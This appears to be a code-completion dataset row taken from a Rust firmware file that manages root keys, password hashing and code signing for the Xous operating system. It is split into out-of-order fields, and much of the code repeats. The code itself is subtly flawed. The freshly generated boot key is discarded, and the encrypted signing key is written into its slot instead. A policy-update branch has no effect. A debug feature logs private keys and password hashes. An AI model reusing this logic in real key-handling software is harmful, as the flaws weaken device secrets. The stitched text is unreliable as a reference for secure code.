Some(NonZeroUsize::new((xous::KERNEL_LOC + xous::FLASH_PHYS_BASE) as usize).unwrap()),
None,
xous::KERNEL_LEN as usize,
xous::MemoryFlags::R,
).expect("couldn't map in the kernel region");
let sensitive_data = xous::syscall::map_memory(
None,
None,
0x1000,
xous::MemoryFlags::R | xous::MemoryFlags::W,
).expect("couldn't map sensitive data page");
let pass_cache = xous::syscall::map_memory(
None,
None,
0x1000,
xous::MemoryFlags::R | xous::MemoryFlags::W,
).expect("couldn't map sensitive data page");
let spinor = spinor::Spinor::new(&xns).expect("couldn't connect to spinor server");
spinor.register_soc_token().expect("couldn't register rootkeys as the one authorized writer to the gateware update area!");
let keys = RootKeys {
keyrom: CSR::new(keyrom.as_mut_ptr() as *mut u32),
gateware,
staging,
loader_code,
kernel,
sensitive_data,
pass_cache,
update_password_policy: PasswordRetentionPolicy::AlwaysPurge,
boot_password_policy: PasswordRetentionPolicy::AlwaysKeep,
cur_password_type: None,
susres: susres::Susres::new_without_hook(&xns).expect("couldn't connect to susres without hook"),
trng: trng::Trng::new(&xns).expect("couldn't connect to TRNG server"),
gam: gam::Gam::new(&xns).expect("couldn't connect to GAM"),
gfx: graphics_server::Gfx::new(&xns).expect("couldn't connect to gfx"),
spinor
};
keys
}
fn purge_password(&mut self, pw_type: PasswordType) {
unsafe {
let pcache_ptr: *mut PasswordCache = self.pass_cache.as_mut_ptr() as *mut PasswordCache;
match pw_type {
PasswordType::Boot => {
for p in (*pcache_ptr).hashed_boot_pw.iter_mut() {
*p = 0;
}
(*pcache_ptr).hashed_boot_pw_valid = 0;
}
PasswordType::Update => {
for p in (*pcache_ptr).hashed_update_pw.iter_mut() {
*p = 0;
}
(*pcache_ptr).hashed_update_pw_valid = 0;
}
}
}
core::sync::atomic::compiler_fence(core::sync::atomic::Ordering::SeqCst);
}
fn purge_sensitive_data(&mut self) {
let data = self.sensitive_data.as_slice_mut::<u32>();
for d in data.iter_mut() {
*d = 0;
}
core::sync::atomic::compiler_fence(core::sync::atomic::Ordering::SeqCst);
}
pub fn suspend(&mut self) {
match self.boot_password_policy {
PasswordRetentionPolicy::AlwaysKeep => {
()
},
_ => {
self.purge_password(PasswordType::Boot);
}
}
match self.update_password_policy {
PasswordRetentionPolicy::AlwaysKeep => {
()
},
_ => {
self.purge_password(PasswordType::Update);
}
}
self.purge_sensitive_data();
}
pub fn resume(&mut self) {
}
pub fn update_policy(&mut self, policy: Option<PasswordRetentionPolicy>) {
let pw_type = if let Some(cur_type) = self.cur_password_type {
cur_type
} else {
log::error!("got an unexpected policy update from the UX");
return;
};
if let Some(p) = policy {
match pw_type {
PasswordType::Boot => self.boot_password_policy = p,
PasswordType::Update => self.update_password_policy = p,
};
} else {
match pw_type {
PasswordType::Boot => PasswordRetentionPolicy::AlwaysPurge,
PasswordType::Update => PasswordRetentionPolicy::AlwaysPurge,
};
}
// once the policy has been set, revert the current type to None
self.cur_password_type = None;
}
/// Plaintext password is passed as a &str. Any copies internally are destroyed. Caller is responsible for destroying the &str original.
/// Performs a bcrypt hash of the password, with the currently set salt; does not store the plaintext after exit.
pub fn hash_and_save_password(&mut self, pw: &str) {
let pw_type = if let Some(cur_type) = self.cur_password_type {
cur_type
} else {
log::error!("got an unexpected password from the UX");
return;
};
let mut hashed_password: [u8; 24] = [0; 24];
let mut salt = self.get_salt();
// we change the salt ever-so-slightly for every password. This doesn't make any one password more secure;
// but it disallows guessing all the passwords with a single off-the-shelf hashcat run.
salt[0] ^= pw_type as u8;
let timer = ticktimer_server::Ticktimer::new().expect("couldn't connect to ticktimer");
// the bcrypt function takes the plaintext password and makes one copy to prime the blowfish bcrypt
// cipher. It is responsible for erasing this state.
let start_time = timer.elapsed_ms();
bcrypt(BCRYPT_COST, &salt, pw, &mut hashed_password); // note: this internally makes a copy of the password, and destroys it
let elapsed = timer.elapsed_ms() - start_time;
log::info!("bcrypt cost: {} time: {}ms", BCRYPT_COST, elapsed); // benchmark to figure out how to set cost parameter
// expand the 24-byte (192-bit) bcrypt result into 256 bits, so we can use it directly as XOR key material
// against 256-bit AES and curve25519 keys
// for such a small hash, software is the most performant choice
let mut hasher = engine_sha512::Sha512Trunc256::new(Some(engine_sha512::FallbackStrategy::SoftwareOnly));
hasher.update(hashed_password);
let digest = hasher.finalize();
let pcache_ptr: *mut PasswordCache = self.pass_cache.as_mut_ptr() as *mut PasswordCache;
unsafe {
match pw_type {
PasswordType::Boot => {
for (&src, dst) in digest.iter().zip((*pcache_ptr).hashed_boot_pw.iter_mut()) {
*dst = src;
}
(*pcache_ptr).hashed_boot_pw_valid = 1;
}
PasswordType::Update => {
for (&src, dst) in digest.iter().zip((*pcache_ptr).hashed_update_pw.iter_mut()) {
*dst = src;
}
(*pcache_ptr).hashed_update_pw_valid = 1;
}
}
}
}
/// Reads a 256-bit key at a given index offset
fn read_key_256(&mut self, index: u8) -> [u8; 32] {
let mut key: [u8; 32] = [0; 32];
for (addr, word) in key.chunks_mut(4).into_iter().enumerate() {
self.keyrom.wfo(utra::keyrom::ADDRESS_ADDRESS, index as u32 + addr as u32);
let keyword = self.keyrom.rf(utra::keyrom::DATA_DATA);
for (&byte, dst) in keyword.to_be_bytes().iter().zip(word.iter_mut()) {
*dst = byte;
}
}
key
}
/// Reads a 128-bit key at a given index offset
fn read_key_128(&mut self, index: u8) -> [u8; 16] {
let mut key: [u8; 16] = [0; 16];
for (addr, word) in key.chunks_mut(4).into_iter().enumerate() {
self.keyrom.wfo(utra::keyrom::ADDRESS_ADDRESS, index as u32 + addr as u32);
let keyword = self.keyrom.rf(utra::keyrom::DATA_DATA);
for (&byte, dst) in keyword.to_be_bytes().iter().zip(word.iter_mut()) {
*dst = byte;
}
}
key
}
/// Returns the `salt` needed for the `bcrypt` routine.
/// This routine handles the special-case of being unitialized: in that case, we need to get
/// salt from a staging area, and not our KEYROM. However, `setup_key_init` must be called
/// first to ensure that the staging area has a valid salt.
fn get_salt(&mut self) -> [u8; 16] {
if !self.is_initialized() {
// we're not initialized, use the salt that should already be in the staging area
let sensitive_slice = self.sensitive_data.as_slice::<u32>();
let mut key: [u8; 16] = [0; 16];
for (word, &keyword) in key.chunks_mut(4).into_iter()
.zip(sensitive_slice[KeyRomLocs::PEPPER as usize..KeyRomLocs::PEPPER as usize + 128/(size_of::<u32>()*8)].iter()) {
for (&byte, dst) in keyword.to_be_bytes().iter().zip(word.iter_mut()) {
*dst = byte;
}
}
key
} else {
self.read_key_128(KeyRomLocs::PEPPER)
}
}
/// Called by the UX layer to track which password we're currently requesting
pub fn set_ux_password_type(&mut self, cur_type: Option<PasswordType>) {
self.cur_password_type = cur_type;
}
/// Called by the UX layer to check which password request is in progress
pub fn get_ux_password_type(&self) -> Option<PasswordType> {self.cur_password_type}
pub fn is_initialized(&mut self) -> bool {
self.keyrom.wfo(utra::keyrom::ADDRESS_ADDRESS, KeyRomLocs::CONFIG as u32);
let config = self.keyrom.rf(utra::keyrom::DATA_DATA);
if config & keyrom_config::INITIALIZED.ms(1) != 0 {
true
} else {
false
}
}
/// Called by the UX layer to set up a key init run. It disables suspend/resume for the duration
/// of the run, and also sets up some missing fields of KEYROM necessary to encrypt passwords.
pub fn setup_key_init(&mut self) {
// block suspend/resume ops during security-sensitive operations
self.susres.set_suspendable(false).expect("couldn't block suspend/resume");
// in this block, keyrom data is copied into RAM.
// make a copy of the KEYROM to hold the new mods, in the sensitive data area
let sensitive_slice = self.sensitive_data.as_slice_mut::<u32>();
for addr in 0..256 {
self.keyrom.wfo(utra::keyrom::ADDRESS_ADDRESS, addr);
sensitive_slice[addr as usize] = self.keyrom.rf(utra::keyrom::DATA_DATA);
}
// provision the pepper
for keyword in sensitive_slice[KeyRomLocs::PEPPER as usize..KeyRomLocs::PEPPER as usize + 128/(size_of::<u32>()*8)].iter_mut() {
*keyword = self.trng.get_u32().expect("couldn't get random number");
}
}
/// Core of the key initialization routine. Requires a `progress_modal` dialog box that has been set
/// up with the appropriate notification messages by the UX layer, and a `Slider` type action which
/// is used to report the progress of the initialization routine. We assume the `Slider` box is set
/// up to report progress on a range of 0-100%.
///
/// This routine dispatches the following activities:
/// - generate signing private key (encrypted with update password)
/// - generate rootkey (encrypted with boot password)
/// - generate signing public key
/// - set the init bit
/// - sign the loader
/// - sign the kernel
/// - compute the patch set for the FPGA bitstream
/// - do the patch (whatever that means - gotta deal with the AES key, HMAC etc.)
/// - verify the FPGA image hmac
/// - sign the FPGA image
/// - get ready for a reboot
/// - returns true if we should reboot (everything succeeded)
/// - returns false if we had an error condition (don't reboot)
pub fn do_key_init(&mut self, progress_modal: &mut Modal, progress_action: &mut Slider) -> bool {
// kick the progress bar to indicate we've entered the routine
update_progress(1, progress_modal, progress_action);
let keypair: Keypair = Keypair::generate(&mut self.trng);
// pub key is easy, no need to encrypt
let public_key: [u8; ed25519_dalek::PUBLIC_KEY_LENGTH] = keypair.public.to_bytes();
{ // scope sensitive_slice narrowly, as it borrows *self mutably, and can mess up later calls that borrow an immutable self
// sensitive_slice is our staging area for the new keyrom contents
let sensitive_slice = self.sensitive_data.as_slice_mut::<u32>();
for (src, dst) in public_key.chunks(4).into_iter()
.zip(sensitive_slice[KeyRomLocs::SELFSIGN_PUBKEY as usize..KeyRomLocs::SELFSIGN_PUBKEY as usize + 256/(size_of::<u32>()*8)].iter_mut()) {
*dst = u32::from_be_bytes(src.try_into().unwrap())
}
}
// extract the update password key from the cache, and apply it to the private key
let pcache: &PasswordCache = unsafe{&*(self.pass_cache.as_mut_ptr() as *mut PasswordCache)};
#[cfg(feature = "hazardous-debug")]
{
log::info!("cached boot passwords {:x?}", pcache.hashed_boot_pw);
log::info!("cached update password: {:x?}", pcache.hashed_update_pw);
}
// private key must XOR with password before storing
let mut private_key_enc: [u8; ed25519_dalek::SECRET_KEY_LENGTH] = [0; ed25519_dalek::SECRET_KEY_LENGTH];
// we do this from to try and avoid making as few copies of the hashed password as possible
for (dst, (plain, key)) in
private_key_enc.iter_mut()
.zip(keypair.secret.to_bytes().iter()
.zip(pcache.hashed_update_pw.iter())) {
*dst = plain ^ key;
}
// store the private key to the keyrom staging area
{
let sensitive_slice = self.sensitive_data.as_slice_mut::<u32>();
for (src, dst) in private_key_enc.chunks(4).into_iter()
.zip(sensitive_slice[KeyRomLocs::SELFSIGN_PRIVKEY as usize..KeyRomLocs::SELFSIGN_PRIVKEY as usize + 256/(size_of::<u32>()*8)].iter_mut()) {
*dst = u32::from_be_bytes(src.try_into().unwrap())
}
} |
// generate and store a root key (aka boot key), this is what is unlocked by the "boot password"
// ironically, it's a "lower security" key because it just acts as a gatekeeper to further
// keys that would have a stronger password applied to them, based upon the importance of the secret
// think of this more as a user PIN login confirmation, than as a significant cryptographic event
let mut boot_key_enc: [u8; 32] = [0; 32];
for (dst, key) in
boot_key_enc.chunks_mut(4).into_iter()
.zip(pcache.hashed_boot_pw.chunks(4).into_iter()) {
let key_word = self.trng.get_u32().unwrap().to_be_bytes();
// just unroll this loop, it's fast and easy enough
(*dst)[0] = key[0] ^ key_word[0];
(*dst)[1] = key[1] ^ key_word[1];
(*dst)[2] = key[2] ^ key_word[2];
(*dst)[3] = key[3] ^ key_word[3];
// also note that interestingly, we don't have to XOR it with the hashed boot password --
// this key isn't used by this routine, just initialized, so really, it only matters to
// XOR it with the password when you use it the first time to encrypt something.
}
// store the boot key to the keyrom staging area
{
let sensitive_slice = self.sensitive_data.as_slice_mut::<u32>();
for (src, dst) in private_key_enc.chunks(4).into_iter()
.zip(sensitive_slice[KeyRomLocs::USER_KEY as usize..KeyRomLocs::USER_KEY as usize + 256/(size_of::<u32>()*8)].iter_mut()) {
*dst = u32::from_be_bytes(src.try_into().unwrap())
}
}
update_progress(20, progress_modal, progress_action);
// sign the loader
let (loader_sig, loader_len) = self.sign_loader(&keypair);
update_progress(30, progress_modal, progress_action);
// sign the kernel
let (kernel_sig, kernel_len) = self.sign_kernel(&keypair);
update_progress(40, progress_modal, progress_action);
// encrypt the FPGA key using the update password. in an un-init system, it is provided to us in plaintext format
// e.g. in the case that we're doing a BBRAM boot (eFuse flow would give us a 0's key and we'd later on set it)
#[cfg(feature = "hazardous-debug")]
self.debug_print_key(KeyRomLocs::FPGA_KEY as usize, 256, "FPGA key before encryption: ");
{
let sensitive_slice = self.sensitive_data.as_slice_mut::<u32>();
for (word, key_word) in sensitive_slice[KeyRomLocs::FPGA_KEY as usize..KeyRomLocs::FPGA_KEY as usize + 256/(size_of::<u32>()*8)].iter_mut()
.zip(pcache.hashed_update_pw.chunks(4).into_iter()) {
*word = *word ^ u32::from_be_bytes(key_word.try_into().unwrap());
}
}
update_progress(50, progress_modal, progress_action);
// set the "init" bit in the staging area
{
let sensitive_slice = self.sensitive_data.as_slice_mut::<u32>();
self.keyrom.wfo(utra::keyrom::ADDRESS_ADDRESS, KeyRomLocs::CONFIG as u32);
let config = self.keyrom.rf(utra::keyrom::DATA_DATA);
sensitive_slice[KeyRomLocs::CONFIG as usize] |= keyrom_config::INITIALIZED.ms(1);
}
update_progress(60, progress_modal, progress_action);
#[cfg(feature = "hazardous-debug")]
{
log::info!("Self private key: {:x?}", keypair.secret.to_bytes());
log::info!("Self public key: {:x?}", keypair.public.to_bytes());
self.debug_staging();
}
// Because we're initializing keys for the *first* time, make a backup copy of the bitstream to
// the staging area. Note that if we're doing an update, the update target would already be
// in the staging area, so this step should be skipped.
self.make_gateware_backup(60, 70, progress_modal, progress_action);
// compute the keyrom patch set for the bitstream
// at this point the KEYROM as replicated in sensitive_slice should have all its assets in place
patch::should_patch(42);
// finalize the progress bar on exit -- always leave at 100%
update_progress(100, progress_modal, progress_action);
true
}
fn make_gateware_backup(&mut self, prog_start: u32, prog_end: u32, progress_modal: &mut Modal, progress_action: &mut Slider) {
// println!("this is a test of stdlib");
}
#[cfg(feature = "hazardous-debug")]
fn debug_staging(&self) {
self.debug_print_key(KeyRomLocs::FPGA_KEY as usize, 256, "FPGA key: ");
self.debug_print_key(KeyRomLocs::SELFSIGN_PRIVKEY as usize, 256, "Self private key: ");
self.debug_print_key(KeyRomLocs::SELFSIGN_PUBKEY as usize, 256, "Self public key: ");
self.debug_print_key(KeyRomLocs::DEVELOPER_PUBKEY as usize, 256, "Dev public key: ");
self.debug_print_key(KeyRomLocs::THIRDPARTY_PUBKEY as usize, 256, "3rd party public key: ");
self.debug_print_key(KeyRomLocs::USER_KEY as usize, 256, "Boot key: ");
self.debug_print_key(KeyRomLocs::PEPPER as usize, 128, "Pepper: ");
self.debug_print_key(KeyRomLocs::CONFIG as usize, 32, "Config (as BE): ");
}
#[cfg(feature = "hazardous-debug")]
fn debug_print_key(&self, offset: usize, num_bits: usize, name: &str) {
use core::fmt::Write;
let mut debugstr = xous_ipc::String::<4096>::new();
let sensitive_slice = self.sensitive_data.as_slice::<u32>();
write!(debugstr, "{}", name).unwrap();
for word in sensitive_slice[offset .. offset as usize + num_bits/(size_of::<u32>()*8)].iter() {
for byte in word.to_be_bytes().iter() {
write!(debugstr, "{:02x}", byte).unwrap();
}
}
log::info!("{}", debugstr);
}
pub fn sign_loader(&mut self, signing_key: &Keypair) -> (Signature, u32) {
let loader_len =
xous::LOADER_CODE_LEN
- SIGBLOCK_SIZE
+ graphics_server::fontmap::FONT_TOTAL_LEN as u32
+ 8; // two u32 words are appended to the end, which repeat the "version" and "length" fields encoded in the signature block
// this is a huge hash, so, get a hardware hasher, even if it means waiting for it
let mut hasher = engine_sha512::Sha512::new(Some(engine_sha512::FallbackStrategy::WaitForHardware));
let loader_region = self.loader_code.as_slice::<u8>();
// the loader data starts one page in; the first page is reserved for the signature itself
hasher.update(&loader_region[SIGBLOCK_SIZE as usize..]);
// now get the font plane data
self.gfx.bulk_read_restart(); // reset the bulk read pointers on the gfx side
let bulkread = BulkRead::default();
let mut buf = xous_ipc::Buffer::into_buf(bulkread).expect("couldn't transform bulkread into aligned buffer");
// this form of loop was chosen to avoid the multiple re-initializations and copies that would be entailed
// in our usual idiom for pasing buffers around. instead, we create a single buffer, and re-use it for
// every iteration of the loop.
loop {
buf.lend_mut(self.gfx.conn(), self.gfx.bulk_read_fontmap_op()).expect("couldn't do bulkread from gfx");
let br = buf.as_flat::<BulkRead, _>().unwrap();
hasher.update(&br.buf[..br.len as usize]);
if br.len != bulkread.buf.len() as u32 {
log::trace!("non-full block len: {}", br.len);
}
if br.len < bulkread.buf.len() as u32 {
// read until we get a buffer that's not fully filled
break;
}
}
if false { // this path is for debugging the loader hash. It spoils the loader signature in the process.
let digest = hasher.finalize();
log::info!("len: {}", loader_len);
log::info!("{:x?}", digest);
// fake hasher for now
let mut hasher = engine_sha512::Sha512::new(Some(engine_sha512::FallbackStrategy::WaitForHardware));
hasher.update(&loader_region[SIGBLOCK_SIZE as usize..]);
(signing_key.sign_prehashed(hasher, None).expect("couldn't sign the loader"), loader_len)
} else {
(signing_key.sign_prehashed(hasher, None).expect("couldn't sign the loader"), loader_len)
}
}
pub fn sign_kernel(&mut self, signing_key: &Keypair) -> (Signature, u32) {
let mut hasher = engine_sha512::Sha512::new(Some(engine_sha512::FallbackStrategy::WaitForHardware));
let kernel_region = self.kernel.as_slice::<u8>();
// for the kernel length, we can't know/trust the given length in the signature field, so we sign the entire
// length of the region. This will increase the time it takes to verify; however, at the current trend, we'll probably
// use most of the available space for the kernel, so by the time we're done maybe only 10-20% of the space is empty.
let kernel_len = kernel_region.len() - SIGBLOCK_SIZE as usize;
hasher.update(&kernel_region[SIGBLOCK_SIZE as usize ..]);
(signing_key.sign_prehashed(hasher, None).expect("couldn't sign the kernel"), kernel_len as u32)
}
/// Called by the UX layer at the epilogue of the initialization run. Allows suspend/resume to resume,
/// and zero-izes any sensitive data that was created in the process.
pub fn finish_key_init(&mut self) {
let sensitive_slice = self.sensitive_data.as_slice_mut::<u32>();
// zeroize the RAM-backed data
for data in sensitive_slice.iter_mut() {
*data = 0;
}
// re-allow suspend/resume ops
self.susres.set_suspendable(true).expect("couldn't re-allow suspend/resume");
}
}
fn update_progress(new_state: u32, progress_modal: &mut Modal, progress_action: &mut Slider) {
log::info!("progress: {}", new_state);
progress_action.set_state(new_state);
progress_modal.modify(
Some(gam::modal::ActionType::Slider(*progress_action)),
None, false, None, false, None);
progress_modal.redraw(); // stage the modal box pixels to the back buffer
progress_modal.gam.redraw().expect("couldn't cause back buffer to be sent to the screen");
xous::yield_slice(); // this gives time for the GAM to do the sending
} |
update_progress(10, progress_modal, progress_action); | random_line_split |
implementation.rs | use gam::FONT_TOTAL_LEN;
use ticktimer_server::Ticktimer;
use utralib::generated::*;
use crate::api::*;
use core::num::NonZeroUsize;
use num_traits::*;
use gam::modal::{Modal, Slider};
use crate::bcrypt::*;
use crate::api::PasswordType;
use core::convert::TryInto;
use ed25519_dalek::{Keypair, Signature, Signer};
use engine_sha512::*;
use digest::Digest;
use graphics_server::BulkRead;
use core::mem::size_of;
use root_keys::key2bits::*;
// TODO: add hardware acceleration for BCRYPT so we can hit the OWASP target without excessive UX delay
const BCRYPT_COST: u32 = 7; // 10 is the minimum recommended by OWASP; takes 5696 ms to verify @ 10 rounds; 804 ms to verify 7 rounds
/// Size of the total area allocated for signatures. It is equal to the size of one FLASH sector, which is the smallest
/// increment that can be erased.
const SIGBLOCK_SIZE: u32 = 0x1000;
#[repr(C)]
struct SignatureInFlash {
pub version: u32,
pub signed_len: u32,
pub signature: [u8; 64],
}
struct KeyRomLocs {}
#[allow(dead_code)]
impl KeyRomLocs {
const FPGA_KEY: u8 = 0x00;
const SELFSIGN_PRIVKEY: u8 = 0x08;
const SELFSIGN_PUBKEY: u8 = 0x10;
const DEVELOPER_PUBKEY: u8 = 0x18;
const THIRDPARTY_PUBKEY: u8 = 0x20;
const USER_KEY: u8 = 0x28;
const PEPPER: u8 = 0xf8;
const FPGA_MIN_REV: u8 = 0xfc;
const LOADER_MIN_REV: u8 = 0xfd;
const CONFIG: u8 = 0xff;
}
pub struct KeyField {
mask: u32,
offset: u32,
}
impl KeyField {
pub const fn new(width: u32, offset: u32) -> Self {
let mask = (1 << width) - 1;
KeyField {
mask,
offset,
}
}
pub fn ms(&self, value: u32) -> u32 {
let ms_le = (value & self.mask) << self.offset;
ms_le.to_be()
}
}
#[allow(dead_code)]
pub(crate) mod keyrom_config {
use crate::KeyField;
pub const VERSION_MINOR: KeyField = KeyField::new(8, 0 );
pub const VERSION_MAJOR: KeyField = KeyField::new(8, 8 );
pub const DEVBOOT_DISABLE: KeyField = KeyField::new(1, 16);
pub const ANTIROLLBACK_ENA: KeyField = KeyField::new(1, 17);
pub const ANTIROLLFORW_ENA: KeyField = KeyField::new(1, 18);
pub const FORWARD_REV_LIMIT: KeyField = KeyField::new(4, 19);
pub const FORWARD_MINOR_LIMIT: KeyField = KeyField::new(4, 23);
pub const INITIALIZED: KeyField = KeyField::new(1, 27);
}
/// This structure is mapped into the password cache page and can be zero-ized at any time
/// we avoid using fancy Rust structures because everything has to "make sense" after a forced zero-ization
/// The "password" here is generated as follows:
/// `user plaintext (up to first 72 bytes) -> bcrypt (24 bytes) -> sha512trunc256 -> [u8; 32]`
/// The final sha512trunc256 expansion is because we will use this to XOR against secret keys stored in
/// the KEYROM that may be up to 256 bits in length. For shorter keys, the hashed password is simply truncated.
#[repr(C)]
struct PasswordCache {
hashed_boot_pw: [u8; 32],
hashed_boot_pw_valid: u32, // non-zero for valid
hashed_update_pw: [u8; 32],
hashed_update_pw_valid: u32,
}
pub(crate) struct RootKeys {
keyrom: utralib::CSR<u32>,
gateware: xous::MemoryRange,
staging: xous::MemoryRange,
loader_code: xous::MemoryRange,
kernel: xous::MemoryRange,
/// regions of RAM that holds all plaintext passwords, keys, and temp data. stuck in two well-defined page so we can
/// zero-ize it upon demand, without guessing about stack frames and/or Rust optimizers removing writes
sensitive_data: xous::MemoryRange, // this gets purged at least on every suspend, but ideally purged sooner than that
pass_cache: xous::MemoryRange, // this can be purged based on a policy, as set below
boot_password_policy: PasswordRetentionPolicy,
update_password_policy: PasswordRetentionPolicy,
cur_password_type: Option<PasswordType>, // for tracking which password we're dealing with at the UX layer
susres: susres::Susres, // for disabling suspend/resume
trng: trng::Trng,
gam: gam::Gam, // for raising UX elements directly
gfx: graphics_server::Gfx, // for reading out font planes for signing verification
spinor: spinor::Spinor,
}
impl RootKeys {
pub fn new(xns: &xous_names::XousNames) -> RootKeys {
let keyrom = xous::syscall::map_memory(
xous::MemoryAddress::new(utra::keyrom::HW_KEYROM_BASE),
None,
4096,
xous::MemoryFlags::R | xous::MemoryFlags::W,
)
.expect("couldn't map keyrom CSR range");
// read-only memory maps. even if we don't refer to them, we map them into our process
// so that no other processes can claim them
let gateware = xous::syscall::map_memory(
Some(NonZeroUsize::new((xous::SOC_MAIN_GW_LOC + xous::FLASH_PHYS_BASE) as usize).unwrap()),
None,
xous::SOC_MAIN_GW_LEN as usize,
xous::MemoryFlags::R,
).expect("couldn't map in the SoC gateware region");
let staging = xous::syscall::map_memory(
Some(NonZeroUsize::new((xous::SOC_STAGING_GW_LOC + xous::FLASH_PHYS_BASE) as usize).unwrap()),
None,
xous::SOC_STAGING_GW_LEN as usize,
xous::MemoryFlags::R,
).expect("couldn't map in the SoC staging region");
let loader_code = xous::syscall::map_memory(
Some(NonZeroUsize::new((xous::LOADER_LOC + xous::FLASH_PHYS_BASE) as usize).unwrap()),
None,
xous::LOADER_CODE_LEN as usize,
xous::MemoryFlags::R,
).expect("couldn't map in the loader code region");
let kernel = xous::syscall::map_memory(
Some(NonZeroUsize::new((xous::KERNEL_LOC + xous::FLASH_PHYS_BASE) as usize).unwrap()),
None,
xous::KERNEL_LEN as usize,
xous::MemoryFlags::R,
).expect("couldn't map in the kernel region");
let sensitive_data = xous::syscall::map_memory(
None,
None,
0x1000,
xous::MemoryFlags::R | xous::MemoryFlags::W,
).expect("couldn't map sensitive data page");
let pass_cache = xous::syscall::map_memory(
None,
None,
0x1000,
xous::MemoryFlags::R | xous::MemoryFlags::W,
).expect("couldn't map sensitive data page");
let spinor = spinor::Spinor::new(&xns).expect("couldn't connect to spinor server");
spinor.register_soc_token().expect("couldn't register rootkeys as the one authorized writer to the gateware update area!");
let keys = RootKeys {
keyrom: CSR::new(keyrom.as_mut_ptr() as *mut u32),
gateware,
staging,
loader_code,
kernel,
sensitive_data,
pass_cache,
update_password_policy: PasswordRetentionPolicy::AlwaysPurge,
boot_password_policy: PasswordRetentionPolicy::AlwaysKeep,
cur_password_type: None,
susres: susres::Susres::new_without_hook(&xns).expect("couldn't connect to susres without hook"),
trng: trng::Trng::new(&xns).expect("couldn't connect to TRNG server"),
gam: gam::Gam::new(&xns).expect("couldn't connect to GAM"),
gfx: graphics_server::Gfx::new(&xns).expect("couldn't connect to gfx"),
spinor
};
keys
}
fn purge_password(&mut self, pw_type: PasswordType) {
unsafe {
let pcache_ptr: *mut PasswordCache = self.pass_cache.as_mut_ptr() as *mut PasswordCache;
match pw_type {
PasswordType::Boot => {
for p in (*pcache_ptr).hashed_boot_pw.iter_mut() {
*p = 0;
}
(*pcache_ptr).hashed_boot_pw_valid = 0;
}
PasswordType::Update => {
for p in (*pcache_ptr).hashed_update_pw.iter_mut() {
*p = 0;
}
(*pcache_ptr).hashed_update_pw_valid = 0;
}
}
}
core::sync::atomic::compiler_fence(core::sync::atomic::Ordering::SeqCst);
}
fn purge_sensitive_data(&mut self) {
let data = self.sensitive_data.as_slice_mut::<u32>();
for d in data.iter_mut() {
*d = 0;
}
core::sync::atomic::compiler_fence(core::sync::atomic::Ordering::SeqCst);
}
pub fn suspend(&mut self) {
match self.boot_password_policy {
PasswordRetentionPolicy::AlwaysKeep => {
()
},
_ => {
self.purge_password(PasswordType::Boot);
}
}
match self.update_password_policy {
PasswordRetentionPolicy::AlwaysKeep => {
()
},
_ => {
self.purge_password(PasswordType::Update);
}
}
self.purge_sensitive_data();
}
pub fn resume(&mut self) {
}
pub fn update_policy(&mut self, policy: Option<PasswordRetentionPolicy>) {
let pw_type = if let Some(cur_type) = self.cur_password_type {
cur_type
} else {
log::error!("got an unexpected policy update from the UX");
return;
};
if let Some(p) = policy {
match pw_type {
PasswordType::Boot => self.boot_password_policy = p,
PasswordType::Update => self.update_password_policy = p,
};
} else {
match pw_type {
PasswordType::Boot => PasswordRetentionPolicy::AlwaysPurge,
PasswordType::Update => PasswordRetentionPolicy::AlwaysPurge,
};
}
// once the policy has been set, revert the current type to None
self.cur_password_type = None;
}
/// Plaintext password is passed as a &str. Any copies internally are destroyed. Caller is responsible for destroying the &str original.
/// Performs a bcrypt hash of the password, with the currently set salt; does not store the plaintext after exit.
pub fn hash_and_save_password(&mut self, pw: &str) {
let pw_type = if let Some(cur_type) = self.cur_password_type {
cur_type
} else {
log::error!("got an unexpected password from the UX");
return;
};
let mut hashed_password: [u8; 24] = [0; 24];
let mut salt = self.get_salt();
// we change the salt ever-so-slightly for every password. This doesn't make any one password more secure;
// but it disallows guessing all the passwords with a single off-the-shelf hashcat run.
salt[0] ^= pw_type as u8;
let timer = ticktimer_server::Ticktimer::new().expect("couldn't connect to ticktimer");
// the bcrypt function takes the plaintext password and makes one copy to prime the blowfish bcrypt
// cipher. It is responsible for erasing this state.
let start_time = timer.elapsed_ms();
bcrypt(BCRYPT_COST, &salt, pw, &mut hashed_password); // note: this internally makes a copy of the password, and destroys it
let elapsed = timer.elapsed_ms() - start_time;
log::info!("bcrypt cost: {} time: {}ms", BCRYPT_COST, elapsed); // benchmark to figure out how to set cost parameter
// expand the 24-byte (192-bit) bcrypt result into 256 bits, so we can use it directly as XOR key material
// against 256-bit AES and curve25519 keys
// for such a small hash, software is the most performant choice
let mut hasher = engine_sha512::Sha512Trunc256::new(Some(engine_sha512::FallbackStrategy::SoftwareOnly));
hasher.update(hashed_password);
let digest = hasher.finalize();
let pcache_ptr: *mut PasswordCache = self.pass_cache.as_mut_ptr() as *mut PasswordCache;
unsafe {
match pw_type {
PasswordType::Boot => {
for (&src, dst) in digest.iter().zip((*pcache_ptr).hashed_boot_pw.iter_mut()) {
*dst = src;
}
(*pcache_ptr).hashed_boot_pw_valid = 1;
}
PasswordType::Update => {
for (&src, dst) in digest.iter().zip((*pcache_ptr).hashed_update_pw.iter_mut()) {
*dst = src;
}
(*pcache_ptr).hashed_update_pw_valid = 1;
}
}
}
}
/// Reads a 256-bit key at a given index offset
fn read_key_256(&mut self, index: u8) -> [u8; 32] |
/// Reads a 128-bit key at a given index offset
fn read_key_128(&mut self, index: u8) -> [u8; 16] {
let mut key: [u8; 16] = [0; 16];
for (addr, word) in key.chunks_mut(4).into_iter().enumerate() {
self.keyrom.wfo(utra::keyrom::ADDRESS_ADDRESS, index as u32 + addr as u32);
let keyword = self.keyrom.rf(utra::keyrom::DATA_DATA);
for (&byte, dst) in keyword.to_be_bytes().iter().zip(word.iter_mut()) {
*dst = byte;
}
}
key
}
/// Returns the `salt` needed for the `bcrypt` routine.
/// This routine handles the special-case of being unitialized: in that case, we need to get
/// salt from a staging area, and not our KEYROM. However, `setup_key_init` must be called
/// first to ensure that the staging area has a valid salt.
fn get_salt(&mut self) -> [u8; 16] {
if !self.is_initialized() {
// we're not initialized, use the salt that should already be in the staging area
let sensitive_slice = self.sensitive_data.as_slice::<u32>();
let mut key: [u8; 16] = [0; 16];
for (word, &keyword) in key.chunks_mut(4).into_iter()
.zip(sensitive_slice[KeyRomLocs::PEPPER as usize..KeyRomLocs::PEPPER as usize + 128/(size_of::<u32>()*8)].iter()) {
for (&byte, dst) in keyword.to_be_bytes().iter().zip(word.iter_mut()) {
*dst = byte;
}
}
key
} else {
self.read_key_128(KeyRomLocs::PEPPER)
}
}
/// Called by the UX layer to track which password we're currently requesting
